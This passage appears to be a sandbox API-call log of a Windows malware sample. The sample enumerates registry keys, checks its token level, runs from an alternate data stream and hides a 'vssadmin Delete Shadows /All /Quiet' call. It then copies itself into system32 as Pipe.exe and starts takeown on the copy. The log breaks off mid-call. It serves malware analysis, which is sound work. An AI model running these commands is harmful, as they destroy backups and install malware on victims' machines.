dwFlags=0x0, lpMem=0x359e60 | out: hHeap=0x340000) returned 1 [0030.450] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x22) returned 0x35a598 [0030.450] lstrcmpW (lpString1="installers", lpString2="properties") returned -1 [0030.450] lstrcmpW (lpString1="categories", lpString2="properties") returned -1 [0030.450] lstrcmpW (lpString1="interfaces", lpString2="properties") returned -1 [0030.450] RegEnumKeyW (in: hKey=0x98, dwIndex=0x22, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaTypes") returned 0x0 [0030.450] lstrlenW (lpString="MediaTypes") returned 10 [0030.450] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x18) returned 0x359e60 [0030.450] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0030.450] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0030.450] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0030.450] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0030.450] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0030.450] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0030.450] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x359e60 | out: hHeap=0x340000) returned 1 [0030.450] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x18) returned 0x359e60 [0030.450] lstrcmpW (lpString1="class", lpString2="types") returned -1 [0030.450] lstrcmpW (lpString1="index", lpString2="types") returned -1 [0030.450] lstrcmpW (lpString1="crash", lpString2="types") returned -1 [0030.450] lstrcmpW (lpString1="group", lpString2="types") returned -1 [0030.450] lstrcmpW (lpString1="order", lpString2="types") returned -1 [0030.451] lstrcmpW (lpString1="media", lpString2="types") returned -1 [0030.451] RegEnumKeyW (in: hKey=0x98, dwIndex=0x23, lpName=0x18fd58, cchName=0x104 | out: lpName="MobilePC") returned 0x0 [0030.451] lstrlenW (lpString="MobilePC") returned 8 [0030.451] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1a) returned 0x3544f0 [0030.451] lstrcmpW (lpString1="backup", lpString2="mobile") returned -1 [0030.451] lstrcmpW (lpString1="device", lpString2="mobile") returned -1 [0030.451] lstrcmpW (lpString1="errata", lpString2="mobile") returned -1 [0030.451] lstrcmpW (lpString1="system", lpString2="mobile") returned 1 [0030.451] lstrcmpW (lpString1="layout", lpString2="mobile") returned -1 [0030.451] lstrcmpW (lpString1="config", lpString2="mobile") returned -1 [0030.451] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x12) returned 0x359e80 [0030.451] lstrcmpW (lpString1="id", lpString2="pc") returned -1 [0030.451] lstrcmpW (lpString1="co", lpString2="pc") returned -1 [0030.451] lstrcmpW (lpString1="db", lpString2="pc") returned -1 [0030.451] RegEnumKeyW (in: hKey=0x98, dwIndex=0x24, lpName=0x18fd58, cchName=0x104 | out: lpName="MPDEV") returned 0x0 [0030.451] lstrlenW (lpString="MPDEV") returned 5 [0030.451] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x18) returned 0x359ea0 [0030.451] lstrcmpW (lpString1="class", lpString2="mpdev") returned -1 [0030.451] lstrcmpW (lpString1="index", lpString2="mpdev") returned -1 [0030.451] lstrcmpW (lpString1="crash", lpString2="mpdev") returned -1 [0030.451] lstrcmpW (lpString1="group", lpString2="mpdev") returned -1 [0030.451] lstrcmpW (lpString1="order", lpString2="mpdev") returned 1 [0030.451] lstrcmpW (lpString1="media", lpString2="mpdev") returned -1 [0030.451] lstrcmpW (lpString1="types", lpString2="mpdev") returned 1 [0030.451] RegEnumKeyW (in: hKey=0x98, dwIndex=0x25, lpName=0x18fd58, cchName=0x104 | out: lpName="MSDTC") returned 0x0 [0030.451] lstrlenW (lpString="MSDTC") returned 5 [0030.451] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x18) returned 0x359ec0 [0030.451] lstrcmpW (lpString1="class", lpString2="msdtc") returned -1 [0030.451] lstrcmpW (lpString1="index", lpString2="msdtc") returned -1 [0030.451] lstrcmpW (lpString1="crash", lpString2="msdtc") returned -1 [0030.451] lstrcmpW (lpString1="group", lpString2="msdtc") returned -1 [0030.451] lstrcmpW (lpString1="order", lpString2="msdtc") returned 1 [0030.451] lstrcmpW (lpString1="media", lpString2="msdtc") returned -1 [0030.452] lstrcmpW (lpString1="types", lpString2="msdtc") returned 1 [0030.452] lstrcmpW (lpString1="mpdev", lpString2="msdtc") returned -1 [0030.452] RegEnumKeyW (in: hKey=0x98, dwIndex=0x26, lpName=0x18fd58, cchName=0x104 | out: lpName="MUI") returned 0x0 [0030.452] lstrlenW (lpString="MUI") returned 3 [0030.452] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x14) returned 0x359ee0 [0030.452] lstrcmpW (lpString1="agp", lpString2="mui") returned -1 [0030.452] lstrcmpW (lpString1="app", lpString2="mui") returned -1 [0030.452] lstrcmpW (lpString1="cmf", lpString2="mui") returned -1 [0030.452] lstrcmpW (lpString1="com", lpString2="mui") returned -1 [0030.452] lstrcmpW (lpString1="els", lpString2="mui") returned -1 [0030.452] lstrcmpW (lpString1="hal", lpString2="mui") returned -1 [0030.452] lstrcmpW (lpString1="lsa", lpString2="mui") returned -1 [0030.452] lstrcmpW (lpString1="drm", lpString2="mui") returned -1 [0030.452] RegEnumKeyW (in: hKey=0x98, dwIndex=0x27, lpName=0x18fd58, cchName=0x104 | out: lpName="NetDiagFx") returned 0x0 [0030.452] lstrlenW (lpString="NetDiagFx") returned 9 [0030.452] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x14) returned 0x359f00 [0030.452] lstrcmpW (lpString1="agp", lpString2="net") returned -1 [0030.452] lstrcmpW (lpString1="app", lpString2="net") returned -1 [0030.452] lstrcmpW (lpString1="cmf", lpString2="net") returned -1 [0030.452] lstrcmpW (lpString1="com", lpString2="net") returned -1 [0030.452] lstrcmpW (lpString1="els", lpString2="net") returned -1 [0030.452] lstrcmpW (lpString1="hal", lpString2="net") returned -1 [0030.452] lstrcmpW (lpString1="lsa", lpString2="net") returned -1 [0030.452] lstrcmpW (lpString1="drm", lpString2="net") returned -1 [0030.452] lstrcmpW (lpString1="mui", lpString2="net") returned -1 [0030.452] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x16) returned 0x359f20 [0030.452] lstrcmpW (lpString1="acpi", lpString2="diag") returned -1 [0030.452] lstrcmpW (lpString1="name", lpString2="diag") returned 1 [0030.452] lstrcmpW (lpString1="file", lpString2="diag") returned 1 [0030.452] lstrcmpW (lpString1="list", lpString2="diag") returned 1 [0030.452] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x12) returned 0x359f40 [0030.452] lstrcmpW (lpString1="id", lpString2="fx") returned 1 [0030.452] lstrcmpW (lpString1="co", lpString2="fx") returned -1 [0030.453] lstrcmpW (lpString1="db", lpString2="fx") returned -1 [0030.453] lstrcmpW (lpString1="pc", lpString2="fx") returned 1 [0030.453] RegEnumKeyW (in: hKey=0x98, dwIndex=0x28, lpName=0x18fd58, cchName=0x104 | out: lpName="NetTrace") returned 0x0 [0030.453] lstrlenW (lpString="NetTrace") returned 8 [0030.453] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x14) returned 0x359f60 [0030.453] lstrcmpW (lpString1="agp", lpString2="net") returned -1 [0030.453] lstrcmpW (lpString1="app", lpString2="net") returned -1 [0030.453] lstrcmpW (lpString1="cmf", lpString2="net") returned -1 [0030.453] lstrcmpW (lpString1="com", lpString2="net") returned -1 [0030.453] lstrcmpW (lpString1="els", lpString2="net") returned -1 [0030.453] lstrcmpW (lpString1="hal", lpString2="net") returned -1 [0030.453] lstrcmpW (lpString1="lsa", lpString2="net") returned -1 [0030.453] lstrcmpW (lpString1="drm", lpString2="net") returned -1 [0030.453] lstrcmpW (lpString1="mui", lpString2="net") returned -1 [0030.453] lstrcmpW (lpString1="net", lpString2="net") returned 0 [0030.453] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x359f60 | out: hHeap=0x340000) returned 1 [0030.453] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x18) returned 0x359f60 [0030.453] lstrcmpW (lpString1="class", lpString2="trace") returned -1 [0030.453] lstrcmpW (lpString1="index", lpString2="trace") returned -1 [0030.453] lstrcmpW (lpString1="crash", lpString2="trace") returned -1 [0030.453] lstrcmpW (lpString1="group", lpString2="trace") returned -1 [0030.453] lstrcmpW (lpString1="order", lpString2="trace") returned -1 [0030.453] RegEnumKeyW (in: hKey=0x98, dwIndex=0x29, lpName=0x18fd58, cchName=0x104 | out: lpName="Network") returned 0x0 [0030.453] lstrlenW (lpString="Network") returned 7 [0030.453] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1c) returned 0x35a5e0 [0030.453] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2a, lpName=0x18fd58, cchName=0x104 | out: lpName="NetworkProvider") returned 0x0 [0030.453] lstrlenW (lpString="NetworkProvider") returned 15 [0030.453] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1c) returned 0x35a608 [0030.453] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2b, lpName=0x18fd58, cchName=0x104 | out: lpName="Nls") returned 0x0 [0030.454] lstrlenW (lpString="Nls") returned 3 [0030.454] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x14) returned 0x359f80 [0030.454] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2c, lpName=0x18fd58, cchName=0x104 | out: lpName="NodeInterfaces") returned 0x0 [0030.454] lstrlenW (lpString="NodeInterfaces") returned 14 [0030.454] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x16) returned 0x359fa0 [0030.454] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2d, lpName=0x18fd58, cchName=0x104 | out: lpName="Nsi") returned 0x0 [0030.454] lstrlenW (lpString="Nsi") returned 3 [0030.454] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x14) returned 0x359fc0 [0030.454] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2e, lpName=0x18fd58, cchName=0x104 | out: lpName="PCW") returned 0x0 [0030.454] lstrlenW (lpString="PCW") returned 3 [0030.454] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x14) returned 0x359fe0 [0030.454] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2f, lpName=0x18fd58, cchName=0x104 | out: lpName="PnP") returned 0x0 [0030.454] lstrlenW (lpString="PnP") returned 3 [0030.454] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x12) returned 0x35a000 [0030.454] RegEnumKeyW (in: hKey=0x98, dwIndex=0x30, lpName=0x18fd58, cchName=0x104 | out: lpName="Power") returned 0x0 [0030.454] lstrlenW (lpString="Power") returned 5 [0030.454] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x18) returned 0x35a020 [0030.454] RegEnumKeyW (in: hKey=0x98, dwIndex=0x31, lpName=0x18fd58, cchName=0x104 | out: lpName="Print") returned 0x0 [0030.454] lstrlenW (lpString="Print") returned 5 [0030.454] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x18) returned 0x35a040 [0030.454] RegEnumKeyW (in: hKey=0x98, dwIndex=0x32, lpName=0x18fd58, cchName=0x104 | out: lpName="PriorityControl") returned 0x0 [0030.454] lstrlenW (lpString="PriorityControl") returned 15 [0030.454] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1e) returned 0x35a630 [0030.454] RegEnumKeyW (in: hKey=0x98, dwIndex=0x33, lpName=0x18fd58, cchName=0x104 | out: lpName="ProductOptions") returned 0x0 [0030.455] lstrlenW (lpString="ProductOptions") returned 14 [0030.455] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1c) returned 0x35a658 [0030.455] RegEnumKeyW (in: hKey=0x98, dwIndex=0x34, lpName=0x18fd58, cchName=0x104 | out: lpName="Remote Assistance") returned 0x0 [0030.455] lstrlenW (lpString="Remote Assistance") returned 17 [0030.455] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1a) returned 0x35a6a8 [0030.455] RegEnumKeyW (in: hKey=0x98, dwIndex=0x35, lpName=0x18fd58, cchName=0x104 | out: lpName="SafeBoot") returned 0x0 [0030.455] lstrlenW (lpString="SafeBoot") returned 8 [0030.455] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x16) returned 0x35a060 [0030.455] RegEnumKeyW (in: hKey=0x98, dwIndex=0x36, lpName=0x18fd58, cchName=0x104 | out: lpName="ScsiPort") returned 0x0 [0030.455] lstrlenW (lpString="ScsiPort") returned 8 [0030.455] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x16) returned 0x35a0a0 [0030.455] RegEnumKeyW (in: hKey=0x98, dwIndex=0x37, lpName=0x18fd58, cchName=0x104 | out: lpName="SecurePipeServers") returned 0x0 [0030.455] lstrlenW (lpString="SecurePipeServers") returned 17 [0030.455] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1a) returned 0x35a6d0 [0030.455] RegEnumKeyW (in: hKey=0x98, dwIndex=0x38, lpName=0x18fd58, cchName=0x104 | out: lpName="SecurityProviders") returned 0x0 [0030.455] lstrlenW (lpString="SecurityProviders") returned 17 [0030.455] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1e) returned 0x35a720 [0030.455] RegEnumKeyW (in: hKey=0x98, dwIndex=0x39, lpName=0x18fd58, cchName=0x104 | out: lpName="ServiceGroupOrder") returned 0x0 [0030.455] lstrlenW (lpString="ServiceGroupOrder") returned 17 [0030.455] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1c) returned 0x35a770 [0030.455] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3a, lpName=0x18fd58, cchName=0x104 | out: lpName="ServiceProvider") returned 0x0 [0030.455] lstrlenW (lpString="ServiceProvider") returned 15 [0030.455] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1c) returned 0x35a798 [0030.455] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3b, lpName=0x18fd58, cchName=0x104 | out: lpName="Session Manager") returned 0x0 [0030.456] lstrlenW (lpString="Session Manager") returned 15 [0030.456] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1c) returned 0x35a798 [0030.456] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3c, lpName=0x18fd58, cchName=0x104 | out: lpName="SNMP") returned 0x0 [0030.456] lstrlenW (lpString="SNMP") returned 4 [0030.456] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x16) returned 0x35a100 [0030.456] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3d, lpName=0x18fd58, cchName=0x104 | out: lpName="SQMServiceList") returned 0x0 [0030.456] lstrlenW (lpString="SQMServiceList") returned 14 [0030.456] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x22) returned 0x35adf8 [0030.456] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3e, lpName=0x18fd58, cchName=0x104 | out: lpName="Srp") returned 0x0 [0030.456] lstrlenW (lpString="Srp") returned 3 [0030.456] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x14) returned 0x35a120 [0030.456] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3f, lpName=0x18fd58, cchName=0x104 | out: lpName="SrpExtensionConfig") returned 0x0 [0030.456] lstrlenW (lpString="SrpExtensionConfig") returned 18 [0030.456] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x14) returned 0x35a140 [0030.456] RegEnumKeyW (in: hKey=0x98, dwIndex=0x40, lpName=0x18fd58, cchName=0x104 | out: lpName="StillImage") returned 0x0 [0030.456] lstrlenW (lpString="StillImage") returned 10 [0030.456] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x18) returned 0x35a140 [0030.456] RegEnumKeyW (in: hKey=0x98, dwIndex=0x41, lpName=0x18fd58, cchName=0x104 | out: lpName="Storage") returned 0x0 [0030.456] lstrlenW (lpString="Storage") returned 7 [0030.456] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1c) returned 0x35a7e8 [0030.456] RegEnumKeyW (in: hKey=0x98, dwIndex=0x42, lpName=0x18fd58, cchName=0x104 | out: lpName="SystemResources") returned 0x0 [0030.456] lstrlenW (lpString="SystemResources") returned 15 [0030.456] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1a) returned 0x35a810 [0030.456] RegEnumKeyW (in: hKey=0x98, dwIndex=0x43, lpName=0x18fd58, cchName=0x104 | out: lpName="TabletPC") returned 0x0 [0030.457] lstrlenW (lpString="TabletPC") returned 8 [0030.457] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1a) returned 0x35a838 [0030.457] RegEnumKeyW (in: hKey=0x98, dwIndex=0x44, lpName=0x18fd58, cchName=0x104 | out: lpName="Terminal Server") returned 0x0 [0030.457] lstrlenW (lpString="Terminal Server") returned 15 [0030.457] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1e) returned 0x35a860 [0030.457] RegEnumKeyW (in: hKey=0x98, dwIndex=0x45, lpName=0x18fd58, cchName=0x104 | out: lpName="TimeZoneInformation") returned 0x0 [0030.457] lstrlenW (lpString="TimeZoneInformation") returned 19 [0030.457] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x16) returned 0x35a180 [0030.457] RegEnumKeyW (in: hKey=0x98, dwIndex=0x46, lpName=0x18fd58, cchName=0x104 | out: lpName="usbflags") returned 0x0 [0030.457] lstrlenW (lpString="usbflags") returned 8 [0030.457] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1e) returned 0x35a8b0 [0030.457] RegEnumKeyW (in: hKey=0x98, dwIndex=0x47, lpName=0x18fd58, cchName=0x104 | out: lpName="usbstor") returned 0x0 [0030.457] lstrlenW (lpString="usbstor") returned 7 [0030.457] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1c) returned 0x35a8d8 [0030.457] RegEnumKeyW (in: hKey=0x98, dwIndex=0x48, lpName=0x18fd58, cchName=0x104 | out: lpName="VAN") returned 0x0 [0030.457] lstrlenW (lpString="VAN") returned 3 [0030.457] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x14) returned 0x35a1c0 [0030.457] RegEnumKeyW (in: hKey=0x98, dwIndex=0x49, lpName=0x18fd58, cchName=0x104 | out: lpName="Video") returned 0x0 [0030.457] lstrlenW (lpString="Video") returned 5 [0030.457] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x18) returned 0x35a1e0 [0030.457] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4a, lpName=0x18fd58, cchName=0x104 | out: lpName="wcncsvc") returned 0x0 [0030.457] lstrlenW (lpString="wcncsvc") returned 7 [0030.457] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1c) returned 0x35a900 [0030.458] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4b, lpName=0x18fd58, cchName=0x104 | out: lpName="Wdf") returned 0x0 [0030.458] lstrlenW (lpString="Wdf") returned 3 [0030.458] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x14) returned 0x35a200 [0030.458] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4c, lpName=0x18fd58, cchName=0x104 | out: lpName="WDI") returned 0x0 [0030.458] lstrlenW (lpString="WDI") returned 3 [0030.458] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x14) returned 0x35a220 [0030.458] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4d, lpName=0x18fd58, cchName=0x104 | out: lpName="Windows") returned 0x0 [0030.458] lstrlenW (lpString="Windows") returned 7 [0030.458] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1c) returned 0x35a928 [0030.458] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4e, lpName=0x18fd58, cchName=0x104 | out: lpName="Winlogon") returned 0x0 [0030.458] lstrlenW (lpString="Winlogon") returned 8 [0030.458] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1e) returned 0x35a950 [0030.458] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4f, lpName=0x18fd58, cchName=0x104 | out: lpName="WMI") returned 0x0 [0030.458] lstrlenW (lpString="WMI") returned 3 [0030.458] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x14) returned 0x35a240 [0030.458] RegEnumKeyW (in: hKey=0x98, dwIndex=0x50, lpName=0x18fd58, cchName=0x104 | out: lpName="hivelist") returned 0x0 [0030.458] lstrlenW (lpString="hivelist") returned 8 [0030.458] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1e) returned 0x35a978 [0030.458] RegEnumKeyW (in: hKey=0x98, dwIndex=0x51, lpName=0x18fd58, cchName=0x104 | out: lpName="SystemInformation") returned 0x0 [0030.458] lstrlenW (lpString="SystemInformation") returned 17 [0030.458] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1a) returned 0x35a9a0 [0030.458] RegEnumKeyW (in: hKey=0x98, dwIndex=0x52, lpName=0x18fd58, cchName=0x104 | out: lpName="Winresume") returned 0x0 [0030.458] lstrlenW (lpString="Winresume") returned 9 [0030.458] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x20) returned 0x35a9a0 [0030.459] RegEnumKeyW (in: hKey=0x98, dwIndex=0x53, lpName=0x18fd58, cchName=0x104 | out: lpName="winresume") returned 0x103 [0030.459] RegCloseKey (hKey=0x98) returned 0x0 [0030.459] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe:bin\" -r" [0030.459] StrChrW (lpStart="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe:bin\" -r", wMatch=0x22) returned="\" -r" [0030.459] StrChrW (lpStart="\" -r", wMatch=0x20) returned=" -r" [0030.459] StrTrimW (in: psz="-r", pszTrimChars=" " | out: psz="-r") returned 0 [0030.459] GetVersion () returned 0x1db10106 [0030.459] GetCurrentProcess () returned 0xffffffff [0030.459] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20008, TokenHandle=0x18ff24 | out: TokenHandle=0x18ff24*=0x98) returned 1 [0030.459] GetTokenInformation (in: TokenHandle=0x98, TokenInformationClass=0x14, TokenInformation=0x18ff1c, TokenInformationLength=0x4, ReturnLength=0x18ff28 | out: TokenInformation=0x18ff1c, ReturnLength=0x18ff28) returned 1 [0030.459] GetTokenInformation (in: TokenHandle=0x98, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18ff28 | out: TokenInformation=0x0, ReturnLength=0x18ff28) returned 0 [0030.459] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x14) returned 0x35a260 [0030.459] GetTokenInformation (in: TokenHandle=0x98, TokenInformationClass=0x19, TokenInformation=0x35a260, TokenInformationLength=0x14, ReturnLength=0x18ff28 | out: TokenInformation=0x35a260, ReturnLength=0x18ff28) returned 1 [0030.459] GetSidSubAuthorityCount (pSid=0x35a268*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x35a269 [0030.459] GetSidSubAuthority (pSid=0x35a268*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x35a270 [0030.459] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x35a260 | out: hHeap=0x340000) returned 1 [0030.459] CloseHandle (hObject=0x98) returned 1 [0030.459] CommandLineToArgvW (in: lpCmdLine="-r", pNumArgs=0x18ff64 | out: pNumArgs=0x18ff64) returned 0x34ef68*="-r" [0030.459] lstrlenW (lpString="-r") returned 2 [0030.459] GetWindowsDirectoryW (in: lpBuffer=0x0, uSize=0x0 | out: lpBuffer=0x0) returned 0xb [0030.459] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x220) returned 0x35ae28 [0030.460] GetWindowsDirectoryW (in: lpBuffer=0x35ae28, uSize=0xc | out: lpBuffer="C:\\Windows") returned 0xa [0030.460] lstrcpyW (in: lpString1=0x35ae3e, lpString2="system32" | out: lpString1="system32") returned="system32" [0030.460] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x1a) returned 0x35a9c8 [0030.460] lstrcpyW (in: lpString1=0x35ae50, lpString2="Pipe" | out: lpString1="Pipe") returned="Pipe" [0030.460] lstrcatW (in: lpString1="C:\\Windows\\system32\\Pipe", lpString2=".exe" | out: lpString1="C:\\Windows\\system32\\Pipe.exe") returned="C:\\Windows\\system32\\Pipe.exe" [0030.460] PathFileExistsW (pszPath="C:\\Windows\\system32\\Pipe.exe") returned 0 [0030.460] lstrlenW (lpString="C:\\Windows\\system32\\Pipe.exe") returned 28 [0030.460] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x240) returned 0x35b050 [0030.460] lstrcpyW (in: lpString1=0x35b078, lpString2="vssadmin.exe Delete Shadows /All /Quiet" | out: lpString1="vssadmin.exe Delete Shadows /All /Quiet") returned="vssadmin.exe Delete Shadows /All /Quiet" [0030.460] GetModuleHandleA (lpModuleName="kernel32") returned 0x76d30000 [0030.460] GetProcAddress (hModule=0x76d30000, lpProcName="Wow64EnableWow64FsRedirection") returned 0x76d5ebe8 [0030.460] Wow64EnableWow64FsRedirection (Wow64FsEnableRedirection=0) returned 1 [0030.460] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\vssadmin.exe Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18feb8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18fefc | out: lpCommandLine="C:\\Windows\\system32\\vssadmin.exe Delete Shadows /All /Quiet", lpProcessInformation=0x18fefc*(hProcess=0x9c, hThread=0x98, dwProcessId=0xa74, dwThreadId=0x31c)) returned 1 [0030.473] Wow64EnableWow64FsRedirection (Wow64FsEnableRedirection=1) returned 1 [0030.473] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0065.931] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x18ff2c | out: lpExitCode=0x18ff2c*=0x0) returned 1 [0065.931] CloseHandle (hObject=0x98) returned 1 [0065.931] CloseHandle (hObject=0x9c) returned 1 [0065.932] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe:bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\pipe:bin"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0065.932] GetFileSize (in: hFile=0x9c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe000 [0065.932] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0xe002) returned 0x35d1f0 [0065.933] ReadFile (in: hFile=0x9c, lpBuffer=0x35d1f0, nNumberOfBytesToRead=0xe000, lpNumberOfBytesRead=0x18ff08, lpOverlapped=0x0 | out: lpBuffer=0x35d1f0*, lpNumberOfBytesRead=0x18ff08*=0xe000, lpOverlapped=0x0) returned 1 [0065.934] CloseHandle (hObject=0x9c) returned 1 [0065.935] CreateFileW (lpFileName="C:\\Windows\\system32\\Pipe.exe" (normalized: "c:\\windows\\system32\\pipe.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0065.936] WriteFile (in: hFile=0x9c, lpBuffer=0x35d1f0*, nNumberOfBytesToWrite=0xe000, lpNumberOfBytesWritten=0x18ff14, lpOverlapped=0x0 | out: lpBuffer=0x35d1f0*, lpNumberOfBytesWritten=0x18ff14*=0xe000, lpOverlapped=0x0) returned 1 [0065.938] SetEndOfFile (hFile=0x9c) returned 1 [0065.938] CloseHandle (hObject=0x9c) returned 1 [0065.938] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x35d1f0 | out: hHeap=0x340000) returned 1 [0065.939] _snwprintf (in: _Dest=0x35b078, _Count=0x120, _Format="takeown.exe /F %s" | out: _Dest="takeown.exe /F C:\\Windows\\system32\\Pipe.exe") returned 43 [0065.939] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\takeown.exe /F C:\\Windows\\system32\\Pipe.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, 